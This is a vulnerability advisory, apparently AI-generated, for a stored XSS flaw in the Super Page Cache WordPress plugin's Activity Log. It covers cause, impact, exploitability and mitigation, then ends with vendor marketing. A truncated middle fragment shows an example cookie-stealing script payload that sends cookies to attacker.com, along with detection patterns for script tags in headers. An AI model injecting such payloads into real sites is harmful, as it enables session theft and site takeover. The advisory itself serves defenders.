
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-1843 is a Stored Cross-Site Scripting (XSS) vulnerability in the Super Page Cache plugin for WordPress, developed by Optimole. The flaw exists in the plugin's Activity Log feature and affects all versions up to and including 5.2.2. Unauthenticated attackers can inject arbitrary web scripts that execute whenever a user visits an affected page. It carries a CVSS v3.1 base score of 7.2 (High) and was published on February 14, 2026 (Red Hat CVE, Wordfence).
The root cause is insufficient input sanitization and output escaping in the Activity Log component of the Super Page Cache plugin, classified as CWE-79 (Improper Neutralization of Input During Web Page Generation). Because the plugin fails to sanitize data written to the activity log and does not escape it on output, an unauthenticated remote attacker can craft a malicious HTTP request that causes arbitrary JavaScript to be stored in the log. The injected script then executes in the browser of any authenticated user (including administrators) who views the Activity Log page, with no user interaction required beyond visiting the page (Red Hat CVE, Infinitsec).
Successful exploitation allows an unauthenticated attacker to execute arbitrary JavaScript in the context of any user who views the Activity Log, including site administrators. This can lead to session token theft, credential harvesting, unauthorized administrative actions (such as creating rogue admin accounts or installing malicious plugins), and full site takeover. The CVSS scope is marked as Changed, reflecting that the impact extends beyond the plugin itself to the broader WordPress environment and its users (Red Hat CVE).
No public exploit code or active in-the-wild exploitation has been reported for CVE-2026-1843 at this time. The vulnerability requires no authentication and no user interaction to inject the payload, though a victim must view the Activity Log page for the script to execute. The EPSS score is approximately 0.074% (0.000740), indicating a currently low probability of exploitation in the wild. It has not been added to the CISA Known Exploited Vulnerabilities (KEV) catalog (Red Hat CVE, Wordfence).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) in a field that is logged by the Activity Log without sanitization, such as a user-agent header, referrer, or other logged parameter.<script>, %3Cscript%3E, javascript:) in user-agent or referrer headers directed at the WordPress site.Users should update the Super Page Cache plugin to a version above 5.2.2, which addresses the insufficient input sanitization and output escaping in the Activity Log. Until an update is applied, administrators should restrict access to the WordPress admin dashboard (including the Activity Log) to trusted IP addresses using server-level controls (e.g., .htaccess or firewall rules). Disabling or removing the plugin entirely is an option if the functionality is not critical. Deploying a Web Application Firewall (WAF) with XSS filtering rules can provide an additional layer of defense (Wordfence, Red Hat CVE).
Wordfence included CVE-2026-1843 in its weekly WordPress vulnerability report for the period of February 9–15, 2026, highlighting it as a notable unauthenticated stored XSS issue (Wordfence). Red Hat also tracked the vulnerability in its security advisory database (Red Hat CVE). No significant broader media coverage or notable researcher commentary beyond standard vulnerability disclosure channels has been identified.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."